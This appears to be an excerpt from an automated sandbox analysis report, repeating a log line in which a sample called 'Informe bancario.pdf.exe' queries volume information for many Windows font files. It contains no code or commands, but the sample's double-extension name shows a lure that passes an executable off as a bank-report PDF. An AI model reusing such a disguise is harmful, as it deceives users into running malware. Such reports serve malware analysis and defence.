              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
